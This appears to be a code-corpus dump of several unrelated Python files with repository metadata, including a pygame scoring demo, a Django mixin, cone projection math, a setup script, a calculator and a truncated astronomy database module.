assert response.get_header("Location") == url
| 1,093 | 0 | 110 |
fba93487b51dcb4e56ba07626edfd9c3d910229c | 2,356 | py | Python | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import time
import pygame
from pygame.locals import *
CHECK_LATCHES_INTERVAL = 100
CHECK_LATCHES = pygame.USEREVENT + 1
if __name__ == '__main__':
main()
| 25.89011 | 64 | 0.556027 | #!/usr/bin/env python
import time
import pygame
from pygame.locals import *
def get_current_time():
return int(round(time.time() * 1000))
class Target(object):
def __init__(self, value):
self.value = value
self.latched = False
self.latch_time = 0
def trigger(self):
if self.latched:
return False
self.latched = True
# Latch for 1 second
self.latch_time = get_current_time() + 1000
return True
def clear(self):
self.latched = False
self.latch_time = 0
CHECK_LATCHES_INTERVAL = 100
CHECK_LATCHES = pygame.USEREVENT + 1
def main():
# Initalize the screen
pygame.init()
screen = pygame.display.set_mode((150, 150))
pygame.display.set_caption('pygame')
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((250, 250, 250))
# Display some text
font = pygame.font.Font(None, 36)
text = font.render("Hello There", 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
background.blit(text, textpos)
# Blit everything to the screen
screen.blit(background, (0, 0))
pygame.display.flip()
# Setup targets
score = 0
target = [Target(100), Target(1000)]
print(target)
print(target[0])
# Setup timers
pygame.time.set_timer(CHECK_LATCHES, CHECK_LATCHES_INTERVAL)
# Event loop
while True:
current_time = get_current_time()
for event in pygame.event.get():
if event.type == QUIT:
return
if event.type == KEYDOWN:
if event.key == K_UP:
hit = target[0].trigger()
if hit:
score += target[0].value
print(score)
if event.key == K_DOWN:
hit = target[1].trigger()
if hit:
score += target[1].value
print(score)
if event.type == CHECK_LATCHES:
for t in target:
if t.latch_time < current_time:
t.clear()
screen.blit(background, (0, 0))
pygame.display.flip()
pygame.time.wait(100)
if __name__ == '__main__':
main()
| 2,022 | 0 | 149 |
6b2527c0cf8404b6e11f579b835d2c36f68128d6 | 272 | py | Python | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | null | null | null | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | 1 | 2022-03-30T21:19:09.000Z | 2022-03-30T21:19:09.000Z | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
| 30.222222 | 77 | 0.683824 | from django.shortcuts import redirect
class StaffUserMixin(object):
def dispatch(self, request, *args, **kwargs):
if not request.user.is_staff:
return redirect("home")
return super(StaffUserMixin, self).dispatch(request, *args, **kwargs)
| 176 | 8 | 49 |
66302df5b876a90bd49810dc1235682c54d54b47 | 11,687 | py | Python | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | import numpy as np
# import _proj as proj_lib
import scipy.sparse as sparse
import scipy.sparse.linalg as splinalg
ZERO = "f"
POS = "l"
SOC = "q"
PSD = "s"
EXP = "ep"
EXP_DUAL = "ed"
POWER = "p"
# The ordering of CONES matches SCS.
CONES = [ZERO, POS, SOC, PSD, EXP, EXP_DUAL, POWER]
def parse_cone_dict(cone_dict):
"""Parses SCS-style cone dictionary."""
return [(cone, cone_dict[cone]) for cone in CONES if cone in cone_dict]
def as_block_diag_linear_operator(matrices):
"""Block diag of SciPy sparse matrices (or linear operators)."""
linear_operators = [splinalg.aslinearoperator(
op) if not isinstance(op, splinalg.LinearOperator) else op
for op in matrices]
num_operators = len(linear_operators)
nrows = [op.shape[0] for op in linear_operators]
ncols = [op.shape[1] for op in linear_operators]
m, n = sum(nrows), sum(ncols)
row_indices = np.append(0, np.cumsum(nrows))
col_indices = np.append(0, np.cumsum(ncols))
return splinalg.LinearOperator((m, n), matvec=matvec, rmatvec=rmatvec)
def unvec_symm(x, dim):
"""Returns a dim-by-dim symmetric matrix corresponding to `x`.
`x` is a vector of length dim*(dim + 1)/2, corresponding to a symmetric
matrix; the correspondence is as in SCS.
X = [ X11 X12 ... X1k
X21 X22 ... X2k
...
Xk1 Xk2 ... Xkk ],
where
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = np.zeros((dim, dim))
# triu_indices gets indices of upper triangular matrix in row-major order
col_idx, row_idx = np.triu_indices(dim)
X[(row_idx, col_idx)] = x
X = X + X.T
X /= np.sqrt(2)
X[np.diag_indices(dim)] = np.diagonal(X) * np.sqrt(2) / 2
return X
def vec_symm(X):
"""Returns a vectorized representation of a symmetric matrix `X`.
Vectorization (including scaling) as per SCS.
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = X.copy()
X *= np.sqrt(2)
X[np.diag_indices(X.shape[0])] = np.diagonal(X) / np.sqrt(2)
col_idx, row_idx = np.triu_indices(X.shape[0])
return X[(row_idx, col_idx)]
def _proj(x, cone, dual=False):
"""Returns the projection of x onto a cone or its dual cone."""
if cone == ZERO:
return x if dual else np.zeros(x.shape)
elif cone == POS:
return np.maximum(x, 0)
elif cone == SOC:
# print("Second Order Cone: x = {}".format(x))
t = x[0]
z = x[1:]
norm_z = np.linalg.norm(z, 2)
if norm_z <= t or np.isclose(norm_z, t, atol=1e-8):
return x
elif norm_z <= -t:
return np.zeros(x.shape)
else:
return 0.5 * (1 + t / norm_z) * np.append(norm_z, z)
elif cone == PSD:
dim = psd_dim(x)
X = unvec_symm(x, dim)
lambd, Q = np.linalg.eig(X)
return vec_symm(Q @ sparse.diags(np.maximum(lambd, 0)) @ Q.T)
elif cone == EXP:
raise NotImplementedError("exp cone is not implemented here yet {}".format(EXP))
num_cones = int(x.size / 3)
out = np.zeros(x.size)
offset = 0
for _ in range(num_cones):
x_i = x[offset:offset + 3]
r, s, t, _ = proj_lib.proj_exp_cone(
float(x_i[0]), float(x_i[1]), float(x_i[2]))
out[offset:offset + 3] = np.array([r, s, t])
offset += 3
# via Moreau
return x - out if dual else out
else:
raise NotImplementedError(f"{cone} not implemented")
def _dproj(x, cone, dual=False):
"""Returns the derivative of projecting onto a cone (or its dual cone) at x.
The derivative is represented as either a sparse matrix or linear operator.
"""
shape = (x.size, x.size)
if cone == ZERO:
return sparse.eye(*shape) if dual else sparse.csc_matrix(shape)
elif cone == POS:
return sparse.diags(.5 * (np.sign(x) + 1), format="csc")
elif cone == SOC:
t = x[0]
z = x[1:]
norm_z = np.linalg.norm(z, 2)
if norm_z <= t:
return sparse.eye(*shape)
elif norm_z <= -t:
return sparse.csc_matrix(shape)
else:
z = z.reshape(z.size)
unit_z = z / norm_z
scale_factor = 1.0 / (2 * norm_z)
t_plus_norm_z = t + norm_z
# derivative is symmetric
return splinalg.LinearOperator(shape, matvec=matvec,
rmatvec=matvec)
elif cone == PSD:
dim = psd_dim(x)
X = unvec_symm(x, dim)
lambd, Q = np.linalg.eig(X)
if np.all(lambd >= 0):
matvec = lambda y: y
return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
# Sort eigenvalues, eigenvectors in ascending order, so that
# we can obtain the index k such that lambd[k-1] < 0 < lambd[k]
idx = lambd.argsort()
lambd = lambd[idx]
Q = Q[:, idx]
k = np.searchsorted(lambd, 0)
B = np.zeros((dim, dim))
pos_gt_k = np.outer(np.maximum(lambd, 0)[k:], np.ones(k))
neg_lt_k = np.outer(np.ones(dim - k), np.minimum(lambd, 0)[:k])
B[k:, :k] = pos_gt_k / (neg_lt_k + pos_gt_k)
B[:k, k:] = B[k:, :k].T
B[k:, k:] = 1
matvec = lambda y: vec_symm(
Q @ (B * (Q.T @ unvec_symm(y, dim) @ Q)) @ Q.T)
return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
elif cone == EXP:
raise NotImplementedError("EXP cone is not implemented here yet {}".format(EXP))
num_cones = int(x.size / 3)
ops = []
offset = 0
for _ in range(num_cones):
x_i = x[offset:offset + 3]
offset += 3
if in_exp(x_i):
ops.append(splinalg.aslinearoperator(sparse.eye(3)))
elif in_exp_dual(-x_i):
ops.append(splinalg.aslinearoperator(
sparse.csc_matrix((3, 3))))
elif x_i[0] < 0 and x_i[1] and not np.isclose(x_i[2], 0):
matvec = lambda y: np.array([
y[0], 0, y[2] * 0.5 * (1 + np.sign(x_i[2]))])
ops.append(splinalg.LinearOperator((3, 3), matvec=matvec,
rmatvec=matvec))
else:
# TODO(akshayka): Cache projection if this is a bottleneck
# TODO(akshayka): y_st is sometimes zero ...
x_st, y_st, _, mu = proj_lib.proj_exp_cone(x_i[0], x_i[1],
x_i[2])
if np.equal(y_st, 0):
y_st = np.abs(x_st)
exp_x_y = np.exp(x_st / y_st)
mu_exp_x_y = mu * exp_x_y
x_mu_exp_x_y = x_st * mu_exp_x_y
M = np.zeros((4, 4))
M[:, 0] = np.array([
1 + mu_exp_x_y / y_st, -x_mu_exp_x_y / (y_st ** 2),
0,
exp_x_y])
M[:, 1] = np.array([
-x_mu_exp_x_y / (y_st ** 2),
1 + x_st * x_mu_exp_x_y / (y_st ** 3),
0, exp_x_y - x_st * exp_x_y / y_st])
M[:, 2] = np.array([0, 0, 1, -1])
M[:, 3] = np.array([
exp_x_y, exp_x_y - x_st * exp_x_y / y_st, -1, 0])
ops.append(splinalg.aslinearoperator(np.linalg.inv(M)[:3, :3]))
D = as_block_diag_linear_operator(ops)
if dual:
return splinalg.LinearOperator((x.size, x.size),
matvec=lambda v: v - D.matvec(v),
rmatvec=lambda v: v - D.rmatvec(v))
else:
return D
else:
raise NotImplementedError(f"{cone} not implemented")
def pi(x, cones, dual=False):
"""Projects x onto product of cones (or their duals)
Args:
x: NumPy array (with PSD data formatted in SCS convention)
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
NumPy array that is the projection of `x` onto the (dual) cones
"""
projection = np.zeros(x.shape)
offset = 0
for cone, sz in cones:
# ===============================
# print(cone, sz) # only uncomment for debug
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
# ===============================
# print("offset:", offset)
# ===============================
projection[offset:offset + dim] = _proj(
x[offset:offset + dim], cone, dual=dual)
offset += dim
# ===============================
# debug for deep analysis
# ===============================
# print("cone type: {:s}, offset: {:d} ".format(cone, offset))
return projection
def dpi(x, cones, dual=False):
"""Derivative of projection onto product of cones (or their duals), at x
Args:
x: NumPy array
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
An abstract linear map representing the derivative, with methods
`matvec` and `rmatvec`
"""
dprojections = []
offset = 0
for cone, sz in cones:
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
dprojections.append(
_dproj(x[offset:offset + dim], cone, dual=dual))
offset += dim
return as_block_diag_linear_operator(dprojections)
| 35.740061 | 100 | 0.520151 | import numpy as np
# import _proj as proj_lib
import scipy.sparse as sparse
import scipy.sparse.linalg as splinalg
ZERO = "f"
POS = "l"
SOC = "q"
PSD = "s"
EXP = "ep"
EXP_DUAL = "ed"
POWER = "p"
# The ordering of CONES matches SCS.
CONES = [ZERO, POS, SOC, PSD, EXP, EXP_DUAL, POWER]
def parse_cone_dict(cone_dict):
"""Parses SCS-style cone dictionary."""
return [(cone, cone_dict[cone]) for cone in CONES if cone in cone_dict]
def as_block_diag_linear_operator(matrices):
"""Block diag of SciPy sparse matrices (or linear operators)."""
linear_operators = [splinalg.aslinearoperator(
op) if not isinstance(op, splinalg.LinearOperator) else op
for op in matrices]
num_operators = len(linear_operators)
nrows = [op.shape[0] for op in linear_operators]
ncols = [op.shape[1] for op in linear_operators]
m, n = sum(nrows), sum(ncols)
row_indices = np.append(0, np.cumsum(nrows))
col_indices = np.append(0, np.cumsum(ncols))
def matvec(x):
output = np.zeros(m)
for i, op in enumerate(linear_operators):
z = x[col_indices[i]:col_indices[i + 1]].ravel()
output[row_indices[i]:row_indices[i + 1]] = op.matvec(z)
return output
def rmatvec(y):
output = np.zeros(n)
for i, op in enumerate(linear_operators):
z = y[row_indices[i]:row_indices[i + 1]].ravel()
output[col_indices[i]:col_indices[i + 1]] = op.rmatvec(z)
return output
return splinalg.LinearOperator((m, n), matvec=matvec, rmatvec=rmatvec)
def transpose_linear_operator(op):
return splinalg.LinearOperator(reversed(op.shape), matvec=op.rmatvec,
rmatvec=op.matvec)
def vec_psd_dim(dim):
return int(dim * (dim + 1) / 2)
def psd_dim(x):
return int(np.sqrt(2 * x.size))
def in_exp(x):
return (x[0] <= 0 and np.isclose(x[1], 0) and x[2] >= 0) or (x[1] > 0 and
x[1] * np.exp(x[0] / x[1]) <= x[2])
def in_exp_dual(x):
# TODO(sbarratt): need to make the numerics safe here, maybe using logs
return (np.isclose(x[0], 0) and x[1] >= 0 and x[2] >= 0) or (
x[0] < 0 and -x[0] * np.exp(x[1] / x[0]) <= np.e * x[2])
def unvec_symm(x, dim):
"""Returns a dim-by-dim symmetric matrix corresponding to `x`.
`x` is a vector of length dim*(dim + 1)/2, corresponding to a symmetric
matrix; the correspondence is as in SCS.
X = [ X11 X12 ... X1k
X21 X22 ... X2k
...
Xk1 Xk2 ... Xkk ],
where
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = np.zeros((dim, dim))
# triu_indices gets indices of upper triangular matrix in row-major order
col_idx, row_idx = np.triu_indices(dim)
X[(row_idx, col_idx)] = x
X = X + X.T
X /= np.sqrt(2)
X[np.diag_indices(dim)] = np.diagonal(X) * np.sqrt(2) / 2
return X
def vec_symm(X):
"""Returns a vectorized representation of a symmetric matrix `X`.
Vectorization (including scaling) as per SCS.
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = X.copy()
X *= np.sqrt(2)
X[np.diag_indices(X.shape[0])] = np.diagonal(X) / np.sqrt(2)
col_idx, row_idx = np.triu_indices(X.shape[0])
return X[(row_idx, col_idx)]
def _proj(x, cone, dual=False):
"""Returns the projection of x onto a cone or its dual cone."""
if cone == ZERO:
return x if dual else np.zeros(x.shape)
elif cone == POS:
return np.maximum(x, 0)
elif cone == SOC:
# print("Second Order Cone: x = {}".format(x))
t = x[0]
z = x[1:]
norm_z = np.linalg.norm(z, 2)
if norm_z <= t or np.isclose(norm_z, t, atol=1e-8):
return x
elif norm_z <= -t:
return np.zeros(x.shape)
else:
return 0.5 * (1 + t / norm_z) * np.append(norm_z, z)
elif cone == PSD:
dim = psd_dim(x)
X = unvec_symm(x, dim)
lambd, Q = np.linalg.eig(X)
return vec_symm(Q @ sparse.diags(np.maximum(lambd, 0)) @ Q.T)
elif cone == EXP:
raise NotImplementedError("exp cone is not implemented here yet {}".format(EXP))
num_cones = int(x.size / 3)
out = np.zeros(x.size)
offset = 0
for _ in range(num_cones):
x_i = x[offset:offset + 3]
r, s, t, _ = proj_lib.proj_exp_cone(
float(x_i[0]), float(x_i[1]), float(x_i[2]))
out[offset:offset + 3] = np.array([r, s, t])
offset += 3
# via Moreau
return x - out if dual else out
else:
raise NotImplementedError(f"{cone} not implemented")
def _dproj(x, cone, dual=False):
"""Returns the derivative of projecting onto a cone (or its dual cone) at x.
The derivative is represented as either a sparse matrix or linear operator.
"""
shape = (x.size, x.size)
if cone == ZERO:
return sparse.eye(*shape) if dual else sparse.csc_matrix(shape)
elif cone == POS:
return sparse.diags(.5 * (np.sign(x) + 1), format="csc")
elif cone == SOC:
t = x[0]
z = x[1:]
norm_z = np.linalg.norm(z, 2)
if norm_z <= t:
return sparse.eye(*shape)
elif norm_z <= -t:
return sparse.csc_matrix(shape)
else:
z = z.reshape(z.size)
unit_z = z / norm_z
scale_factor = 1.0 / (2 * norm_z)
t_plus_norm_z = t + norm_z
def matvec(y):
t_in = y[0]
z_in = y[1:]
first = norm_z * t_in + np.dot(z, z_in)
rest = z * t_in + t_plus_norm_z * z_in - \
t * unit_z * np.dot(unit_z, z_in)
return scale_factor * np.append(first, rest)
# derivative is symmetric
return splinalg.LinearOperator(shape, matvec=matvec,
rmatvec=matvec)
elif cone == PSD:
dim = psd_dim(x)
X = unvec_symm(x, dim)
lambd, Q = np.linalg.eig(X)
if np.all(lambd >= 0):
matvec = lambda y: y
return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
# Sort eigenvalues, eigenvectors in ascending order, so that
# we can obtain the index k such that lambd[k-1] < 0 < lambd[k]
idx = lambd.argsort()
lambd = lambd[idx]
Q = Q[:, idx]
k = np.searchsorted(lambd, 0)
B = np.zeros((dim, dim))
pos_gt_k = np.outer(np.maximum(lambd, 0)[k:], np.ones(k))
neg_lt_k = np.outer(np.ones(dim - k), np.minimum(lambd, 0)[:k])
B[k:, :k] = pos_gt_k / (neg_lt_k + pos_gt_k)
B[:k, k:] = B[k:, :k].T
B[k:, k:] = 1
matvec = lambda y: vec_symm(
Q @ (B * (Q.T @ unvec_symm(y, dim) @ Q)) @ Q.T)
return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
elif cone == EXP:
raise NotImplementedError("EXP cone is not implemented here yet {}".format(EXP))
num_cones = int(x.size / 3)
ops = []
offset = 0
for _ in range(num_cones):
x_i = x[offset:offset + 3]
offset += 3
if in_exp(x_i):
ops.append(splinalg.aslinearoperator(sparse.eye(3)))
elif in_exp_dual(-x_i):
ops.append(splinalg.aslinearoperator(
sparse.csc_matrix((3, 3))))
elif x_i[0] < 0 and x_i[1] and not np.isclose(x_i[2], 0):
matvec = lambda y: np.array([
y[0], 0, y[2] * 0.5 * (1 + np.sign(x_i[2]))])
ops.append(splinalg.LinearOperator((3, 3), matvec=matvec,
rmatvec=matvec))
else:
# TODO(akshayka): Cache projection if this is a bottleneck
# TODO(akshayka): y_st is sometimes zero ...
x_st, y_st, _, mu = proj_lib.proj_exp_cone(x_i[0], x_i[1],
x_i[2])
if np.equal(y_st, 0):
y_st = np.abs(x_st)
exp_x_y = np.exp(x_st / y_st)
mu_exp_x_y = mu * exp_x_y
x_mu_exp_x_y = x_st * mu_exp_x_y
M = np.zeros((4, 4))
M[:, 0] = np.array([
1 + mu_exp_x_y / y_st, -x_mu_exp_x_y / (y_st ** 2),
0,
exp_x_y])
M[:, 1] = np.array([
-x_mu_exp_x_y / (y_st ** 2),
1 + x_st * x_mu_exp_x_y / (y_st ** 3),
0, exp_x_y - x_st * exp_x_y / y_st])
M[:, 2] = np.array([0, 0, 1, -1])
M[:, 3] = np.array([
exp_x_y, exp_x_y - x_st * exp_x_y / y_st, -1, 0])
ops.append(splinalg.aslinearoperator(np.linalg.inv(M)[:3, :3]))
D = as_block_diag_linear_operator(ops)
if dual:
return splinalg.LinearOperator((x.size, x.size),
matvec=lambda v: v - D.matvec(v),
rmatvec=lambda v: v - D.rmatvec(v))
else:
return D
else:
raise NotImplementedError(f"{cone} not implemented")
def pi(x, cones, dual=False):
"""Projects x onto product of cones (or their duals)
Args:
x: NumPy array (with PSD data formatted in SCS convention)
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
NumPy array that is the projection of `x` onto the (dual) cones
"""
projection = np.zeros(x.shape)
offset = 0
for cone, sz in cones:
# ===============================
# print(cone, sz) # only uncomment for debug
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
# ===============================
# print("offset:", offset)
# ===============================
projection[offset:offset + dim] = _proj(
x[offset:offset + dim], cone, dual=dual)
offset += dim
# ===============================
# debug for deep analysis
# ===============================
# print("cone type: {:s}, offset: {:d} ".format(cone, offset))
return projection
def dpi(x, cones, dual=False):
"""Derivative of projection onto product of cones (or their duals), at x
Args:
x: NumPy array
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
An abstract linear map representing the derivative, with methods
`matvec` and `rmatvec`
"""
dprojections = []
offset = 0
for cone, sz in cones:
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
dprojections.append(
_dproj(x[offset:offset + dim], cone, dual=dual))
offset += dim
return as_block_diag_linear_operator(dprojections)
| 1,314 | 0 | 204 |
df963607b23ba51f62d020e9b2d3d72b9c78d77a | 1,025 | py | Python | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | 3 | 2018-07-02T14:39:44.000Z | 2020-12-14T12:58:43.000Z | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | 2 | 2020-07-02T17:26:05.000Z | 2020-07-03T16:53:55.000Z | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | null | null | null | from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Flask-WTF-Decorators',
version='0.1.2',
license='MIT',
url='https://github.com/simpleapples/flask-wtf-decorators/',
author='Zhiya Zang',
author_email='zangzhiya@gmail.com',
description='Decorators for flask-wtf',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests']),
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License'
],
include_package_data=True,
platforms='any',
install_requires=['Flask>=0.7', 'Flask-WTF>=0.9'],
)
| 31.060606 | 64 | 0.653659 | from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Flask-WTF-Decorators',
version='0.1.2',
license='MIT',
url='https://github.com/simpleapples/flask-wtf-decorators/',
author='Zhiya Zang',
author_email='zangzhiya@gmail.com',
description='Decorators for flask-wtf',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests']),
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License'
],
include_package_data=True,
platforms='any',
install_requires=['Flask>=0.7', 'Flask-WTF>=0.9'],
)
| 0 | 0 | 0 |
ed24c7e0cb89b766670c2e6075918647dc12e22a | 1,070 | py | Python | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | from astrolib.solar_system.celestial_objects import CelestialObject
from astrolib.solar_system.motion_models import OriginFixedMotionModel
from astrolib.solar_system.orientation_models import InertiallyFixedOrientationModel
Sun = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mercury = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Venus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Earth = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mars = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Jupiter = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Saturn = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Neptune = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Uranus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Pluto = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
| 71.333333 | 85 | 0.879439 | from astrolib.solar_system.celestial_objects import CelestialObject
from astrolib.solar_system.motion_models import OriginFixedMotionModel
from astrolib.solar_system.orientation_models import InertiallyFixedOrientationModel
Sun = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mercury = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Venus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Earth = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mars = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Jupiter = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Saturn = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Neptune = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Uranus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Pluto = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
| 0 | 0 | 0 |
7c889c3645f09d24f1f01e75c97d332a09c86a9e | 715 | py | Python | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-04T14:39:02.000Z | 2021-10-04T14:39:02.000Z | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-06T04:41:55.000Z | 2021-10-06T04:41:55.000Z | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-08T12:31:04.000Z | 2021-10-08T12:31:04.000Z | #python program - make simple calculator
print("1. adiition")
print("2. subtraction")
print("3. multiplication")
print("4. division")
print("5. exit")
choice = int(input("enter your choice: "))
if (choice>=1 and choice<=4):
print("enter two numbers: ")
num1 = int(input())
num2 = int(input())
if choice ==1:
res = num1 + num2
print("result = ", res)
elif choice == 2:
res = num1 - num2
print("result=",res)
elif choice==3:
res=num1*num2
print("result=",res)
else:
res=num1/num2
print("result=",res)
elif choice==5:
exit()
else:
print("wrong input..!!")
| 21.666667 | 42 | 0.516084 | #python program - make simple calculator
print("1. adiition")
print("2. subtraction")
print("3. multiplication")
print("4. division")
print("5. exit")
choice = int(input("enter your choice: "))
if (choice>=1 and choice<=4):
print("enter two numbers: ")
num1 = int(input())
num2 = int(input())
if choice ==1:
res = num1 + num2
print("result = ", res)
elif choice == 2:
res = num1 - num2
print("result=",res)
elif choice==3:
res=num1*num2
print("result=",res)
else:
res=num1/num2
print("result=",res)
elif choice==5:
exit()
else:
print("wrong input..!!")
| 0 | 0 | 0 |
6a7cf670831b403d0054682d331d46306648544a | 3,688 | py | Python | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
] | 3 | 2020-11-23T18:47:37.000Z | 2021-08-05T17:45:51.000Z | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
] | 5 | 2021-08-19T00:54:57.000Z | 2022-02-10T00:15:40.000Z | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
] | 3 | 2019-07-12T21:00:57.000Z | 2020-06-03T22:18:13.000Z | """
Code for a database of MOA light curves including non-microlensing, single lensing, and binary lensing collcetions.
"""
from ramjet.data_interface.moa_data_interface import MoaDataInterface
from ramjet.photometric_database.derived.moa_survey_light_curve_collection import MoaSurveyLightCurveCollection
from ramjet.photometric_database.standard_and_injected_light_curve_database import \
StandardAndInjectedLightCurveDatabase, OutOfBoundsInjectionHandlingMethod, BaselineFluxEstimationMethod
class MoaSurveyNoneSingleAndBinaryDatabase(StandardAndInjectedLightCurveDatabase):
"""
A class for a database of MOA light curves including non-microlensing, single lensing, and binary lensing
collections.
"""
moa_data_interface = MoaDataInterface()
| 59.483871 | 120 | 0.638015 | """
Code for a database of MOA light curves including non-microlensing, single lensing, and binary lensing collcetions.
"""
from ramjet.data_interface.moa_data_interface import MoaDataInterface
from ramjet.photometric_database.derived.moa_survey_light_curve_collection import MoaSurveyLightCurveCollection
